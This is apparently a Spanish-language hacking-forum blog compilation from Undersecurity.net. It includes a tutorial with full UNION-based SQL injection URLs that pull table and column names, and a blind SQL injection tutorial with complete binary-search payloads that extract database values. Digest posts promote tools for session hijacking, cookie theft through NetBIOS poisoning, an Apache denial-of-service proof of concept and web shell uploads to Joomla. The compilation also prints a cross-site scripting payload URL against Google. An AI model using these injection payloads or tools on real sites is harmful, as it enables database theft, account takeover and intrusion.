• Minería de Datos (OzX)
• LFI & RFI: Bypass de filtros – El pdf de la charla (Seth)
• Conexión a Mysql en C [SEC]

Gracias A Toda la Comunidad Mitm.cl Por participar en esta iniciativa

Sin lugar a dudas, este es el tipo de inyección que mas fácil se puede obtener información, en un par de consultas se  lograría obtener el nombre de usuario y contraseña del administrador del sistema o de algún usuario con privilegios.
Pero también consta de una etapa que es engorrosa, la obtención de tablas y sus correspondientes campos. Claramente en una base de datos Mysql Versión 5.x.
Gracias a la base de datos information_schema, podemos obtener las tablas y los campos de la base de datos.

La sintaxis Común de la obtención de las tablas es la siguiente.

Code block

SELECT+table_name+FROM+information_schema.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1

Con dicha consulta obtendríamos la primera tabla de la base de datos, luego aumentando el valor de limit podríamos obtener las demás tablas.

Luego de encontrar la tabla que nosotros creemos que contendría la información de los usuarios, procedemos a obtener los campos de dicha tabla.

Por ej. , Para obtener los campos de la tabla “usuarios”.

Debemos transformar el nombre usuarios a su valor hexsql.
Usuario: 0×7573756172696F73

Code block

SELECT+column_name+FROM+information_schema.COLUMNS+WHERE+table_name=0�7573756172696F73+LIMIT+0,1

Y así tendríamos los datos necesarios para poder generar la consulta final, hacia la base de datos.
Pero luego de hacerlo varias veces en distintas paginas, esta metodología resulta bastante agobiante,al  tener que consultar cada tabla, cada campo por  separado, es por ello que desarrolle una query que muestra la información que a nosotros nos interesa en 1 sola petición.

Ejemplo Consulta Final:

Localhost/vulnz.php?id=1+and+1=0+union+select+all+1,2,group_concat(column_name,0x3A,table_name,0x3C62723E),4,5,6+from+information_schema.columns+where+table_name=(select+table_name+from+information_schema.tables+where+table_schema=database()+and+table_name+REGEXP+0x2E2A282875735B75655D7C6C6F675B696F5D6E7C61646D29292E2A+limit+0,1)+limit+0,1--

Resultado:

Obtendríamos los valores de la siguiente manera.

Campo, Tabla.

Analicemos a Fondo la Consulta.

Consulta que Obtiene las Columnas en Base a una Tabla.

Code block

=1+and+1=0+union+select+all+1,2,group_concat(column_name,0x3A,table_name,0x3C62723E),4,5,6+from+information_schema.columns+where+table_name=(CONSULTA_RESTRICCION)+limit+0,1--

Consulta Restricción: Con Esta Consulta obtendremos la o las tablas que cumplan con la restricción impuesta por la expresión regular.

Code block

select+table_name+from+information_schema.tables+where+table_schema=database()+and+table_name+REGEXP+0x2E2A282875735B75655D7C6C6F675B696F5D6E7C61646D29292E2A+limit+0,1

Expresión  Regular.

REGEXP+0×2E2A282875735B75655D7C6C6F675B696F5D6E7C61646D29292E2A

Code block

.*((us[ue]|log[io]n|adm)).*

Con esta Expresión podríamos obtener algunos de los nombres mas comunes de las tablas que contienen información relacionada con los usuarios como podría ser :

• Usuario
• Username
• User
• Administrador
• Administrator
• Login
• Logon
• etc

Ejemplo Real:

Code block

http://www.localhost.org/noticias.php?id=39+and+1=2+union+select+1,2,3,4,group_concat(column_name,0x3A,table_name,0x3C62723E),6+from+information_schema.columns+where+table_name=(select+table_name+from+information_schema.tables+where+table_schema=database()+and+table_name+REGEXP+0x2E2A282875735B75655D7C6C6F675B696F5D6E7C61646D29292E2A+limit+0,1)+limit+0,1--

Saludos a Todo el Staff de Undersecurity.net

OzX [Undersecurity.net]

• No Pretenderé Ocupar conceptos enredados, ni tampoco caer en tecnicismo, lo explicare como yo lo entiendo, y como me fuese gustado que me lo explicaran.
• Esta Publicación esta enfocada a las personas que tengan nociones básicas de Blind SQL Injection, quienes no saben de qué estoy hablando, es mejor  que busquen algún tutorial de este tipo de vulnerabilidad en Nuestra Comunidad. o lean los siguientes conceptos.

Conceptos :

1. Seccion SQL Injection en Undersecurity
2. ¿Que es el Formato ASCII?

Comandos en MYSQL :

1. MID
2. ASCII

Control De Flujos:

1. CASE
2. IF

Información Blind SQL Injection

1. Blind SQL Injection by Netting

Información Búsqueda Binaria

1. Busqueda Binaria
2. Arbol Binario

Ahora bien empecemos…
Las Blind SQL Injection, es un tipo de vulnerabilidad que es bastante común y de una explotación bastante sencilla, pero tiene 1 solo problema. Es necesario  generar una cantidad de peticiones bastante considerables hasta encontrar un valor verdadero. Por lo que se convierte en una explotación bastante lenta y tediosa.
Por Ejemplo, Planteemos el Siguiente Escenario.

Tabla User

Datos Contenidos en la tabla User:

• Usuario: Administrador
• Password: Undersecurity

Ahora bien, Para Empezar Nosotros Obtendremos el Primer Valor del Usuario, mediante la metodología  Común para explotar las Blind SQL Injection.  (En un Ambiente Controlado dentro de la consola, no es una situación real de explotación).
Para encontrar un valor verdadero tendremos que testear desde el Carácter 32 de la Tabla Ascii Hasta el Valor 122.
Como Podemos Observar en la Siguiente Imagen, el Primer valor del Usuario es “A”, transformado al formato Ascii obtendría el valor de  65.

En la Practica Tendríamos que Generar  33 Peticiones (65 – 32) para Recién Obtener el Primer valor del usuario.
Y si nos ponemos  bien extremistas, si el usuario se llamara zamorano, tendríamos que generar  90 peticiones para recién Obtener el Valor. Por lo que se hace  bastante lento y tedioso este tipo de explotación.

Ahora viene  la implementación de Búsqueda Binaria.
La Búsqueda Binaria se basa en la teoría de divide y vencerás. La Idea es ir dividiendo  el  rango en mitades.
Por Ejemplo : La clave que queremos encontrar es 9.
Tenemos el Siguiente String
arreglo =(1,2,3,4,5,6,7,8,9,10,11);
Dividimos en 2 el String Obteniendo.

1. Restricción = ( 1, 2, 3, 4, 5,6 ) false
2. Restricción =    (6, 7, 8, 9, 10,11) true

Si se fijan la cantidad de números dentro del arreglo, es impar, por lo  que se necesita repetir un numero dentro de los 2 String resultantes (6), para obtener 2 String Con la misma cantidad de caracteres.
Y Ahora ¿Cuál seria Nuestro String a Seguir?, El que Tenga Nuestro Valor a Buscar, en este caso el segundo String o la segunda restricción.

1. Restricción = (6, 7,8) false
2. Restricción = (9, 10,11) true
   

1. Restricción =  (9,10) true
   
2. Restricción =  (10,11) false

1. Restricción =  (9) true
   
2. Restricción =  (10) false

Finalmente obtenemos nuestro valor, dentro de la primera restricción. Con una cantidad de   4 peticiones.

Esta Misma Metodología Ahora la Aplicaremos a una Blind SQL Injection.

Ahora Aplicaremos los Valores de la tabla Ascii desde el valor 32 hasta el 122.

• Arreglo : 32-122 [Space-z]
• Restriccion_1: 32-72 [Space-M]
• Restricción_2: 72-122 [M-z]

Utilizáramos el Siguiente  Consulta SQL.

Query Global:

Code block

+AND+ (SELECT+IF ((ARREGLO), (RESTRICCION_1), false)) —

Explicación:

Si El valor a encontrar esta entre los valores del arreglo, entonces consultar si están dentro de la primera restricción. por el contrario si el valor a buscar no esta dentro de la primera restricción, entonces esto significa, que esta dentro de la segunda restricción.

Query : Restricción_1

Code block

SELECT+case+(ascii(mid((CONSULTA),SUBSTRING,1))+RESTRICCION_1)+when+true+then+(true)+else+false+end

Explicacion :

En el caso que el primer valor de la consulta este dentro del rango de la restriccion 1, entonces retornara verdadero. por el contrario retornara falso.

Ahora bien, un Simple Ejemplo :

• Consulta :

Code block

SELECT+user()

Valor de user () : Administrador@localhost.com

Valor a Obtener : A

Valor ASCII :65

• Parametros:

Arreglo: 32-122 [Space-z]
Restriccion_1: 32-72 [Space-M]
Restriccion_2: 72-122 [M-z]

Consulta Completa :

Code block

http://www.host.com/vulnz.php?id=1+AND+(SELECT+IF((SELECT+case+(ascii(mid((SELECT+user()),1,1))+BETWEEN+32+AND+122)+when+true+then+(true)+else+false+end),(SELECT+case+(ascii(mid((SELECT+user()),1,1))+BETWEEN+32+AND+77)+when+true+then+(true)+else+false+end),false))--

Explicacion :

Buscaremos el Primer valor de la consulta “select user()”, el cual es A, (Ascii: 65), primero consultaremos si el  valor esta entre 32-122 [Space-z], si este resulta verdadero entonces retonara TRUE , o por el contrario si no esta dentro del rango 32-122 retornara FALSE.

Si el valor  retornado por la primera consulta es TRUE , entonces consultara si el primer valor esta entre 32-77 [Space-M], si esto es verdadero retornara TRUE, por el contrario retonara FALSE y el valor estaria entre 72-122[M-z].

En Esta  Consulta Reducimos Nuestras alternativas de 90 a 45.

¿Podrías Adivinar que Estado Retornara la Consulta , Si el valor a Buscar es 64?

• Si Pensaste en TRUE, estas en lo Correcto.

Luego En la Segunda vuelta , el  rango que se encuentre dentro del valor a buscar (en este caso 32-77), se convertirá en nuestro arreglo, y se dividirá en 2 ([32-54]-[55-77]), así sucesivamente, hasta encontrar el valor final, en solo 7 consultas.
Grafica :
Tamaño Completo

(Solo Muestra el Rango desde 32-77)

Para Demostrar Esta Metodología Desarrolle un Pequeño Programa que solamente muestra 1 carácter,  en 7 peticiones.

Aclaro :  Es un PoC en Php.

Posteriormente dentro del Lab de Undersecurity.net Se desarrollara la Tool Completa.

Imagen :

Código del POC Llamado BlindD00l:

Descargar Blind00l

• Testeado En Mysql 5.x
• Curl Activado

Gracias a toda la Comunidad Undersecurity.net

• Cic4tr1z : logística Infinita
• Nork : Correcciones y Apoyo en ideas extravagantes.
• 1995: Apoyo Incondicional.
• N0b0dy :Notable y leal animo a la comunidad.
• Lix : Por ser Simplemente Lix.
• y A muchos mas que quedaron en el camino.

#OzX [Undersecurity.net]

Primeramente añadiré unos que deberían haber estado en el post anterior y que se me pasó (gracias Lix ) y luego pondré los demás.

Vulnerabilidad en la fijación de sesión (Session Fixation)

SH4V nos deja un artículo sobre como robar las sesiones mediante el uso de la vulnerabilidad Session Fixation. Una razón de más para usar el zorro y a NoScript (L)

Rastreo y exploración de sistemas

Dejo la introducción que elaboró SH4V para su artículo:

En esta guía vamos a aprender técnicas y métodos de exploración de redes y sistemas. Veremos métodos para identificar estaciones de trabajo de una red, métodos de rastreo estándar como vainilla conect() y SYN medio abierto, métodos sigilosos de rastreo (indicador de TCP inverso, indicador ACK), métodos anónimos (rastreo de rebote FTP, rastreo de rebote en Proxy) y rastreo de puertos UDP. Pensaba incluir también una técnica silenciosa para enumerar servicios utilizando zombies, pero debido a la extensión y a las posibilidades que ofrece, se dejará para más adelante, ya que no daría tiempo a explicarla como se merece en este how-to.

HTTP al descubierto

Todo el mundo hace un uso del protocolo HTTP  pero menos gente conoce bien como éste trabaja. En este artículo Lix nos enseña un poco más sobre HTTP y sus características

Matando el domingo con Reverse engineering..

n0b0dy nos vuelve a recordar la fuerza de la curiosidad y lo importante que es en el avance de esta área.

El texto muestra el proceso que siguió para descifrar una shell c99 la cual tenía unas características que le llamaron la atención. En este artículo nuestro compañero nos brinda un artículo ingenioso y de calidad.

Como extraer un email de un texto

Este hilo no es ningún artículo en concreto pero no por ello no puede estar aquí. Un user hizo una pregunta sobre como extraer cierta información de un texto a lo que le respondieron con una solución mediante EXPRESIONES REGULARES. Las expresiones regulares es un tema muy curioso y no fácil de controlar y en este hilo podemos ver soluciones prácticas y eficientes.

Componente com_zoom (joomla) Blind SQL Injection

1995 (AKA el chico avance ) nos muestra una vulnerabilidad Blind SQLI en un componente de joomla.

Ruby Session Grinder Hijacker v. 1.0

Sh4V comparte con nosotros una herramienta para intentar interceptar sesiones. A partir de aquí se genera una serie de comentarios muy interesantes sobre esta área.  Hay que destacar el análisis que ha hecho C1c sobre la generación de las sesiones en PHP.

—-

Recordamos que en el blog se pondrán las ideas y proyectos surgidos en US así que animo a la gente a participar y a escribir sus propios artículos!!

Saludos y un fuerte abrazo!

~UNDERSECURITY

Destacamos pues:

SQLI Input Ripper 0.1 ( SIR )

Se trata de un script en php que optimiza ENORMEMENTE el análisis de vulnerabilidades SQLI. Se le introduce como parámetro un archivo de texto donde están las webs a analizar y éste buscará los posibles inputs vulnerables de las páginas. Lo mejor de todo? Que hace una excelente combinación con nuestro Reverse DNS ya que éste analiza las DNS alojadas en un mismo servidor y te las vuelca en un archivo de texto el cual puedes pasarle a SIR y así en pocos minutos tienes un análisis completo de TODO un servidor.

Gracias a nuestro hermano Oz!!

NBNSCRIPT – Robando cookies envenenando dominios inexistentes por netbios

El amigo hkm publicó en US un script para robar cookies de una manera bastante original. Éste script redirecciona los dominios y subdominios inexistentes a una página la cual cogerá las cookies. De que sirve tener cookies de dominios inexistentes? Pues aquí entra en juego la creatividad que tubo hkm, la página que recoge las cookies contiene unos iframes que van dirigios a sub/dominios inexistentes pero que la DNS es resuelta a la página original: “0.google.com, 0.live.com, -hi5.com, .facebook.com…” por lo que de esta manera obtendremos la cookie de la página original . Buena esa, eh?

apache_dos.c – Apache D.O.S proof-of-concept

C1c4Tr1Z nos trae un POC sobre un tema tratado en milw0rm el cual provoca, en cierta medida, un D.O.S al apache. Él mismo anuncia que está estudiando la forma de combatir estos ataques. Yo me mantendría al tanto, no?

Tutorial Subir Web Shell a Joomla y Mambo

El viejo amigo 1995 nos deleita con un how-to para subir una shell a sistemas joomla y mambo. Recomiendo encarecidamente echarle un vistazo

YASBU 0.1 (SQL INJECTIONS TOOLS)

Más o menos todos los que ya lleváis un tiempo sabréis de que os hablo cuando digo YASBU. Se trata de un proyecto que optimiza las inyecciones SQL para extraer automáticamente los datos sensibles de una BD. Todo ésto lo hace bajo una interfaz amable e intuitiva. A parte, tenéis un vídeo que os facilitará el uso.

Mencionar también que a quien le interese este proyecto puede contribuir a su versión 0.2. Podéis discutir sobre este aspecto en http://foro.undersecurity.net/read.php?23,1241

PHPSHELL UnderSecurity

Aunque este proyecto no esté acabado me gustaría darle publicidad a ver si entre todos se puede conseguir el propósito. Ya hay una idea como base y unos códigos de ejemplos para quien quiera continuarlo.

Os animo a que participéis!!!

Correo Electrónico [SMTP | POP | IMAP ~ CIFRADO Y SEGURIDAD]

SH4V se trabajó una guía sobre correo electrónico, dando una explicación detallada junto con ejemplos prácticos. Sin duda es una guía que merece ser leída

LFI, explicacion basica…

El MC n0b0dy ( haha ) explica, para todo aquel que no sabe que es un LFI, en que consiste y como se explota esta vulnerabilidad. Como todo lo que estoy poniendo aquí, merece ser leído ^^

Consultas Avanzadas a servidores DNS

Otro gran artículo de SH4V, que como el título dice sirve para sacar información importante de los servidores DNS. Como es normal en él usa una explicación detallada y ejemplos prácticos.

Como vulnerabilidad únicamente citar un XSS del gigante GOOGLE (podéis mirar todo el trabajo que han hecho los users en este aspecto AQUÍ):

http://www.googlelabs.com/?q=%3Cscript%3Ealert(/xss/)%3C/script%3E&apps=Search+Labs

Donde iter lo anunciaba

Pido disculpas si me he olvidado de mostrar algún otro post interesante, dado que desde el inicio en US se ha cultivado MUCHA información de calidad. Por esto aconsejo a todo el que lea el blog a participar en la comunidad y comprobar por él mismo el buen ambiente y calidad que poco a poco estamos cogiendo.

Semanalmente iremos añadiendo una recopilación con los temas más importantes que se han creado en el foro. Así que ya sabéis!!

Un saludo departe de todo el equipo y gracias por estar con nosotros en nuestro camino!

~UNDER SECURITY

Bajo estos conceptos UnderSecurity crece día día, con el apoyo de todos sus integrantes, personas de más de 10 paises, las cuales se esfuerzan continuamente, para hacer de ésta, una mejor comunidad.